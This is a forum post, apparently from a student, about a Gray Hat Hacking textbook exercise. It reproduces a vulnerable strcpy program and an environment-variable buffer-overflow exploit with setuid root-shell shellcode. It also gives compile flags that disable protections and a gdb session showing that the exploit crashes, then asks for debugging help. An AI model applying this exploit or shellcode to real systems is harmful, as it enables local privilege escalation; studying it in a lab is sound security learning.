《灰帽黑客(第4版)》,226页,有关利用环境变量实施漏洞溢出的部分,具体代码如下:
//smallbuff.c
#include <string.h>
int main(int argc, char *argv[])
{
char buff[10];
strcpy(buff, argv[1]);
}
//exploit2.c
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#define VULN "./smallbuff"
#define SIZE 160
char shellcode[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0"
"\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
main(int argc, char **argv)
{
char p[SIZE];
char *env[] = {shellcode, NULL};
char *vuln[] = {VULN, p, NULL};
int *ptr, i, addr;
addr = 0xbffffffa - strlen(shellcode) - strlen(VULN);
fprintf(stderr, "[***] using address: %#010x\n", addr);
ptr = (int*)(p + 2);
for(i=0; i<SIZE; i+=4)
{
//*ptr++ = addr;
*ptr = addr;
ptr++;
}
execle(vuln[0], (char*)vuln, p, NULL, env);
exit(1);
}
//test.sh:编译
gcc -ggdb -mpreferred-stack-boundary=2 -fno-stack-protector -z execstack -o smallbuff smallbuff.c
sudo chmod u+s smallbuff
gcc -o exploit2 exploit2.c
//执行及结果
>./exploit2
[***] using address: 0xbfffffba
段错误 (核心已转储)
gdb 调试 exploit2
>gdb -q exploit2
(gdb) disass main
Dump of assembler code for function main:
0x08048464 <+0>: push %ebp
0x08048465 <+1>: mov %esp,%ebp
0x08048467 <+3>: push %edi
0x08048468 <+4>: and $0xfffffff0,%esp
0x0804846b <+7>: sub $0x100,%esp
0x08048471 <+13>: mov 0xc(%ebp),%eax
0x08048474 <+16>: mov %eax,0x2c(%esp)
................................
0x08048502 <+158>: mov %eax,0x50(%esp)
0x08048506 <+162>: movl $0x0,0x54(%esp)
[B][COLOR="Blue"]0x0804850e <+170>: jmp 0x8048524 <main+192>[/COLOR][/B]
0x08048510 <+172>: mov 0x50(%esp),%eax
0x08048514 <+176>: mov 0x58(%esp),%edx
0x08048518 <+180>: mov %edx,(%eax)
0x0804851a <+182>: addl $0x4,0x50(%esp)
0x0804851f <+187>: addl $0x4,0x54(%esp)
0x08048524 <+192>: cmpl $0x9f,0x54(%esp)
0x0804852c <+200>: jle 0x8048510 <main+172>
0x0804852e <+202>: mov 0x3c(%esp),%eax
0x08048532 <+206>: lea 0x48(%esp),%edx
0x08048536 <+210>: mov %edx,0x10(%esp)
0x0804853a <+214>: movl $0x0,0xc(%esp)
0x08048542 <+222>: lea 0x5c(%esp),%edx
0x08048546 <+226>: mov %edx,0x8(%esp)
0x0804854a <+230>: lea 0x3c(%esp),%edx
0x0804854e <+234>: mov %edx,0x4(%esp)
0x08048552 <+238>: mov %eax,(%esp)
[COLOR="Blue"][B]0x08048555 <+241>: call 0x80483a0 <execle@plt>[/B][/COLOR]
0x0804855a <+246>: movl $0x1,(%esp)
0x08048561 <+253>: call 0x8048370 <exit@plt>
End of assembler dump.
调试过程:
1)设置断点1:
> b *0x0804850e
> run
获得 addr 的地址(源代码:addr = 0xbffffffa - strlen(shellcode) - strlen(VULN); 即shellcode首址。
addr = 0xbfffffba
2)设置断点2:
> b *0x08048555
> cont
> x /xs 0xbfffffba
0xbfffffba: "ERM=gnome-terminal"
0xbfffffcd: "/home/kkk/test/gray_hat_hacking/11/01/exploit2"
0xbffffffc: ""
0xbffffffd: ""
0xbffffffe: ""
0xbfffffff: ""
0xc0000000: <Address 0xc0000000 out of bounds>
0xc0000000: <Address 0xc0000000 out of bounds>
可见,shellcode并没有在 0xbfffffba(gdb调试发现该处存放的是 环境变量的内容)。
问题:
为何shellcode没在以0xbfffffba为起始地址的地方?我是按照书里的例子原样打上去的,
哪里出问题了?有之前调试过这个例子的吗?
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)
